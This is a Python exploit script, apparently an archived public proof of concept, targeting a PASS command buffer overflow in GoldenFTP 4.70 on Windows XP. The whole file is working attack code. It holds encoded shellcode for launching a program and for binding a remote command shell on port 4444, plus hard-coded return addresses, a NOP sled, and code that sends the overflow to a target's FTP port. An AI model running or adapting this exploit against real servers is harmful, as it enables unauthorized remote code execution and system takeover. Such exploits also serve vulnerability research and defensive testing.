Golden FTP 4.70 Overflow

`#!/usr/bin/python  
#  
# Exploit Title: GoldenFTP 4.70 PASS overflow exploit (v2.5)  
# Date: July 8, 2011  
# Author: Joff Thyer ([email protected])  
# Software Link: http://www.goldenftpserver.com/  
# Version: 4.70  
# Tested on: WinXP-SP0/SP2/SP3  
# CVE: 2006-6576  
#  
# based on exploit by:  
# Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)  
#  
# You must make sure that the "Show new connections" option is enabled  
# in order for this exploit to work.  
#  
# Notes:  
# Specifying the IP source address is used in the calculation of the  
# overflow buffer offset. It is important that the source address  
# be specified correctly.  
#  
  
import socket  
import sys  
from subprocess import Popen, PIPE  
import re  
import time  
  
# Metasploit  
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3  
# 281 bytes  
calc = \  
"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\  
"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\  
"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\  
"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\  
"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\  
"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\  
"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\  
"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\  
"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\  
"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\  
"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\  
"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\  
"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\  
"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\  
"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\  
"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\  
"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\  
"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\  
"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\  
"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\  
"\x88"  
  
# Metasploit  
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3  
# 422 bytes  
cmdshell = \  
"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\  
"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\  
"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\  
"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\  
"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\  
"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\  
"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\  
"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\  
"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\  
"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\  
"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\  
"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\  
"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\  
"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\  
"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\  
"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\  
"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\  
"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\  
"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\  
"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\  
"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\  
"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\  
"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\  
"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\  
"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\  
"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\  
"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\  
"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\  
"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\  
"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\  
"\x8c\xc7"  
  
if len(sys.argv) < 5:  
print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]  
print "\tshellcode = (calc|shell)"  
print "\tplatform = (sp0|sp2|sp3)"  
print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"  
sys.exit(0)  
  
srcaddr = sys.argv[1]  
target = sys.argv[2]  
shellcode = sys.argv[3]  
platform = sys.argv[4]  
  
# which payload?  
buf = calc  
if shellcode == "calc":  
buf = calc  
elif shellcode == "shell":  
buf = cmdshell  
  
# address of JMP ESI in Kernel32.dll  
if platform == "sp0":  
jmpesi = "\x7b\x15\xe8\x77"  
elif platform == "sp2":  
jmpesi = "\xc3\x72\x85\x7c"  
elif platform == "sp3":  
jmpesi = "\x0b\xda\x82\x7c"  
  
shortjmp = "\x90\x90\x90\x90\xeb\x20\n"  
nopsled = "\x90" * 60  
padding = "A" * (533 - len(srcaddr + buf + nopsled))  
payload = nopsled + buf + padding + jmpesi  
  
print "\  
[+] Golden FTP PASS Exploit\n\  
[+] Version 2.5, July 8 2011\n\  
[+] Author: Joff Thyer ([email protected])\n\  
[+] 'Show new connections' must be enabled in GoldenFTP in order\n\  
[+] for this exploit to succeed!\n\  
[+] Connecting: "+target  
  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
try:  
s.connect((target,21))  
except:  
print "[-] Connection to "+target+" failed!"  
sys.exit(0)  
  
print "[+] Sending payload, length = " + `len(payload)`  
s.send(shortjmp);  
s.send("USER anonymous\n")  
s.send("PASS " + payload + "\n")  
s.recv(1024)  
print "[+] Sleeping 2 secs..."  
time.sleep(2)  
s.close()  
  
if shellcode == "shell" and srcaddr == target:  
p = Popen(["netstat","-na"],stdout=PIPE,shell=False)  
netstat = p.stdout.read()  
shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)  
if shellok:  
print "[+] "+shellok.group(0)  
  
print "[+] Done."  
sys.exit(0)  
  
  
  
`